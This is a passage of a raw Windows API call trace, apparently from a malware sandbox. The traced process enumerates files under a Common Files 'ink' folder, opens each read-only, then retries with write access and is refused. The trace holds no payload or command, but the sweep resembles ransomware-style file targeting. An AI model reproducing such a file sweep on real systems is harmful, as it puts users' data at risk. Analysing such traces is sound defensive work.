Parameter=0x1086e48, Context=0x0) returned 1 [0099.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0099.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.202] AreFileApisANSI () returned 1 [0099.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml", lpUsedDefaultChar=0x0) returned 87 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0099.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.202] AreFileApisANSI () returned 1 [0099.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0099.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81b40 [0099.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x81b40, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 87 [0099.203] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.203] GetFileType (hFile=0x27c) returned 0x1 [0099.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0099.297] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.298] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.298] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.298] CloseHandle (hObject=0x27c) returned 1 [0099.298] AreFileApisANSI () returned 1 [0099.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0099.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x816f0 [0099.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x816f0, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 87 [0099.298] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.299] GetLastError () returned 0x5 [0099.299] GetLastError () returned 0x5 [0099.299] SetLastError (dwErrCode=0x5) [0099.299] GetLastError () returned 0x5 [0099.299] SetLastError (dwErrCode=0x5) [0099.299] GetLastError () returned 0x5 [0099.299] SetLastError (dwErrCode=0x5) [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x816f0 | out: hHeap=0x20000) returned 1 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0099.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.299] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.299] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0xac, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x55f28, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0xac, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧·")) returned 0 [0099.299] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0099.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0099.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0099.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0099.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0099.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0099.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.300] AreFileApisANSI () returned 1 [0099.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml", lpUsedDefaultChar=0x0) returned 76 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.300] AreFileApisANSI () returned 1 [0099.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85120 [0099.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 76 [0099.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.301] GetFileType (hFile=0x418) returned 0x1 [0099.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0099.301] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.301] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.301] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.301] CloseHandle (hObject=0x418) returned 1 [0099.302] AreFileApisANSI () returned 1 [0099.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0099.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x856c0 [0099.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 76 [0099.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.302] GetLastError () returned 0x5 [0099.302] GetLastError () returned 0x5 [0099.302] SetLastError (dwErrCode=0x5) [0099.302] GetLastError () returned 0x5 [0099.302] SetLastError (dwErrCode=0x5) [0099.302] GetLastError () returned 0x5 [0099.302] SetLastError (dwErrCode=0x5) [0099.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0099.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.302] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.302] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa063932e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="keypad", cAlternateFileName="")) returned 1 [0099.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0099.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0099.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0099.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0099.303] AreFileApisANSI () returned 1 [0099.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad", lpUsedDefaultChar=0x0) returned 72 [0099.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0099.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.303] AreFileApisANSI () returned 1 [0099.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0099.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 72 [0099.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.303] GetLastError () returned 0x5 [0099.303] GetLastError () returned 0x5 [0099.303] SetLastError (dwErrCode=0x5) [0099.303] GetLastError () returned 0x5 [0099.304] SetLastError (dwErrCode=0x5) [0099.304] GetLastError () returned 0x5 [0099.304] SetLastError (dwErrCode=0x5) [0099.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0099.304] AreFileApisANSI () returned 1 [0099.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0099.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0099.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad") returned 72 [0099.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.304] GetLastError () returned 0x5 [0099.304] GetLastError () returned 0x5 [0099.304] SetLastError (dwErrCode=0x5) [0099.304] GetLastError () returned 0x5 [0099.304] SetLastError (dwErrCode=0x5) [0099.304] GetLastError () returned 0x5 [0099.304] SetLastError (dwErrCode=0x5) [0099.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0099.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0099.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.304] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0099.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0099.305] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0099.305] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77f90 [0099.305] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa063932e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.305] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea.xml", cAlternateFileName="")) returned 1 [0099.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0099.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0099.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 